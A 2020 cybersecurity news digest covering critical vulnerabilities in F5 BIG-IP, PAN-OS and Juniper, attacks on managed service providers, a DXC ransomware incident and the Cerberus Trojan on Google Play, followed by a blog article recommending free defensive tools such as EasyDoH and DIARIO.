Last Wednesday a new critical Remote Code Execution vulnerability (CVE-2020-5902 CVSSv3 10)  was published for F5’s Traffic Management User Interface (TMUI). This vulnerability allows for unauthenticated attackers, or authenticated users, with network access to the TMUI, through the BIG-IP management port and/or Self IPs, to execute arbitrary system commands, create or delete files, disable services, and/or execute arbitrary Java code. This vulnerability may result in complete system compromise. The BIG-IP system in Appliance mode is also vulnerable. This issue is not exposed on the data plane; only the control plane is affected. F5 recommends to update to a corrected version of this software, especially since the first attempts to exploit this flaw have been made public and Metasploit has added a PoC to its exploitation framework. Moreover, US Cybercom urged last Friday to patch with no delay. In the event of not being able to apply F5’s patch, the company has indicated a series of temporary mitigating measures. Meanwhile, researchers have begun sharing rules for the detection of exploitation attempts in IDS systems that might be useful to verify that everything is working correctly after patching and to rule out any exploitation attempts. A few days after being known to the public, security researchers Chase Dardaman and Rich Mirch together with the CriticalStart TeamAres found a bypass allowing exploitation of the bug on devices where mitigation measures were implemented. Successful exploitation of BIG-IP devices allows attackers to fully compromise the system, get user credentials, or laterally traverse the device’s internal network. The researchers who uncovered this bypass are working with F5 Security Incident Response Team (SIRT) to update the CVE-2020-5902 security advisory

More details: https://support.f5.com/csp/article/K52145254

Attacks against Manage Service Providers (MSPs)

The US Secret Service sent out a security alert in June warning US public and private sectors about an increase in attacks against managed service providers, MSPs. These services provide remote management software for companies and are built around a server-client software architecture that would enable an attacker with access to the server to view and manipulare data in the clients’ systems. The alert informs about the identification of attacks following this pattern to achieve the compromise of point-of-sale systems, to perform business email compromise (BEC) scams, and to deploy ransomware (malawre families such as Sodinokibi/REvil are known to make use of this entry vector). Some days after the warning was released, popular MSP ConnectWise fixed an Automate API flaw that was abused in several intrusions.

More info: https://www.zdnet.com/google-amp/article/us-secret-service-reports-an-increase-in-hacked-managed-service-providers-msps/

DXC identifies ransomware attack involving its Xchanging subsidiary

Global IT services and solutions provider DXC Technology announced over the weekend a ransomware attack on systems of its Xchanging subsidiary. Xchanging is known as a managed service provider for businesses in the insurance industry but its list of customers includes companies from other fields. The company reported the incident on July 5th, expressing confidence that it did not spread outside Xchanging’s network. It is unclear when the company detected the attack but so far, the investigation has not reveal any indication of data being affected. The number of customers affected has not been disclosed and as usual with such incidents, the company is working with law enforcement and authorities on the investigation. No information about the family of the ransomware used in the attack has been revealed yet.

Learn more: https://www.dxc.technology/newsroom/press_releases/149112-dxc_identifies_ransomware_attack_on_part_of_its_xchanging_environment

Banking Trojan Cerberus Discovered on Google Play

Avast Cybersecurity Team has published a report on the detection of a Cerberus banking Trojan on Google Play targeting Android users in Spain. According to the researchers, this malicious software had remained obfuscated in an application called “Calculadora de Moneda“. This application was accepted by Google Play sometime last March and, although at first it did not cause any harm to the victims, once it gained the trust of the users the application started to activate a code that allowed to connect to a Command & Control server. From there, the C&C instructed the application to download an additional APK to the affected devices: Cerberus. Among the features of this tool: ability to create overlays on legitimate banking applications in order to exfiltrate victim’s credentials, read SMS to obtain unique access codes or get details of the second authentication factor. It is estimated that the malicious application was downloaded more than 10,000 times.

Details: https://blog.avast.com/avast-finds-banking-trojan-cerberus-on-google-play-avast

New Vulnerability in PAN-OS

Just one week after fixing a critical vulnerability in PAN-OS (CVE-2020-2021), Palo Alto Networks has fixed a new serious flaw in PAN-OS GlobalProtect. This is a command injection vulnerability in the operating system that would allow an unauthenticated remote attacker to execute arbitrary operating system commands with root privileges on unpatched devices. It has got the identifier CVE-2020-2034 and a CVSS 3.x severity of 8.1, as it can be exploited by attackers with network access to vulnerable servers as part of a more complex attack that does not require user interaction. PAN-OS versions < 9.1.3, < 9.0.0 < 8.1.15, 8.0 and 7.1 are affected. The flaw cannot be exploited if the GlobalProtect portal is not enabled and, in addition, the attacker needs certain information about the firewall configuration or will need to perform some kind of brute-force attack in order to exploit the vulnerability. Telefónica is taking the appropriate action to identify and patch the vulnerability.

More: https://www.bleepingcomputer.com/news/security/palo-alto-networks-fixes-another-severe-flaw-in-pan-os-devices/

Juniper security bulletin

Yestarday, Juniper published a security bulletin that patches 19 vulnerabilities in their products. Amidst all of them, it is worth highlighting a critical vulnerability (CVSSv3 9.8) with the reference CVE-2020-1654. This issue appears when processing a malformed HTTP message that may lead to a Denial of Service (DoS) or Remote Code Execution (RCE) if the ICAP (Internet Content Adaptation Protocol) redirect service is enabled. The affected products are Juniper Networks Junos OS on SRX Series, versions 18.1, 18.2, 18.3, 18.4, 19.1, 19.2 & 19.3. To remediate the issue, it is recommended to apply the updates provided by Juniper.

Info: https://kb.juniper.net/InfoCenter/index?page=content&channel=SECURITY_ADVISORIES

How to Protect Yourself from Pandemic Cyberattacks Using Free Tools

Diego Samuel Espitia    9 July, 2020

There is no doubt that this COVID-19 pandemic has changed the daily life of humanity, not only while the pandemic lasts, but forever. Many companies are seeking to implement teleworking as a permanent method for their employees.

This fact is increasing the time we stay connected, as observed in the connectivity statistics from the months of confinement and beyond, opening multiple possibilities for users and employers who need to use technology for such everyday things as food shopping. However, this is also a great opportunity for cybercriminals to carry out scam-based attacks, that we have discussed in previous articles and that Microsoft has reported as very serious on its security blog.

In many articles we have been told about the consequences of these risks materializing, but in many cases we do not know which tools we should set up or how to mitigate them. In this article we will see what free tools we can use and what they protect us from.

Attacks While Surfing the Internet

When using the browser, we are exposed to many different threats. When you make a typing mistake or receive a DNS attack you may end up on fraudulent websites. When you are at home, without a business protection system, it is very difficult to detect them.

To avoid this, it is necessary to set up a system that controls DNS (Domain Name System) spoofing attacks. By doing so, the URL requested in the browser is manipulated to avoid fraudulent sites due to a scanning error or by following a malicious link.

In Firefox, all you have to do is install our EasyDoH extension, recently updated to simplify the configuration of the DNS server that the user wants to use. With a simple configuration in the extension, we can see in the following image how it protects from malicious sites:

Configuración de EasyDoH

The second threat is when some malicious executable on the website runs a process without “touching the disk”. This means that, without us downloading or directly executing anything, they perform actions from the browser’s memory. This is a very critical threat, because when it does not reach the disk protection systems such as AntiVirus or EndPoint Response cannot detect the threat.

For this we have recently developed an extension that, like the previous one, just needs to be installed for the browser to start controlling this threat. This extension is called AMSIext and is available for Chrome and Firefox. Once installed, it connects the browser to the system called AMSI, which allows to validate the programs to be executed in memory before their execution.

File-Based Attacks

There is no doubt that file-based scams are one of the techniques most widely used by cybercriminals and have increased significantly in recent times. Criminals use two mechanisms that, although they seem simple, are very effective in bypassing some of our PC’s controls.

  1. The first technique we are going to focus on is the change of file extensions. Windows trusts file extensions too much and, for example, if the extension is .docx, it opens the file with MS Word regardless of the content. To avoid this risk, we have developed a program to validate that the extension matches the Magic Numbers (forensic technique for full file identification).

    This program called MEC only needs to be installed on your computer and, automatically, every time the user tries to open a file, the system compares the Magic Numbers with the extension. If they do not match, the program shows the user that the file cannot be opened with the program that the extension suggests.
  2. The second file-based threat that has increased exponentially in recent months is malware hidden within Macros and JavaScript in MS Word, MS Excel and PDF documents. This time, if the user opens the files and grants execution permissions, it is actually opening the door for cybercriminals to execute actions or connect to the machine.

    To combat this type of threat we have developed DIARIO, a free tool for users to check all documents they receive by email or download from the Internet before opening them, and thus validate whether or not they contain malicious macros. To protect users’ privacy, DIARIO’s artificial intelligence only uses the macro for analysis, protecting the sensitive information that the file may contain.

    The tool can be used directly on the website or you can download the installer depending on your machine’s operating system. The suspicious file is uploaded and then the tool provides information about whether or not it has any executable processes and whether or not they are malicious, as it can be seen in the image below:
Funcionamiento de DIARIO

As we can see, we have several free and simple tools to significantly increase our security levels, closing the door to the most common attacks currently being executed. Nowadays, we are all searching for information, so cybercriminals take advantage of the circumstances to make a profit and attack us. This is why it is necessary to be more protected than ever.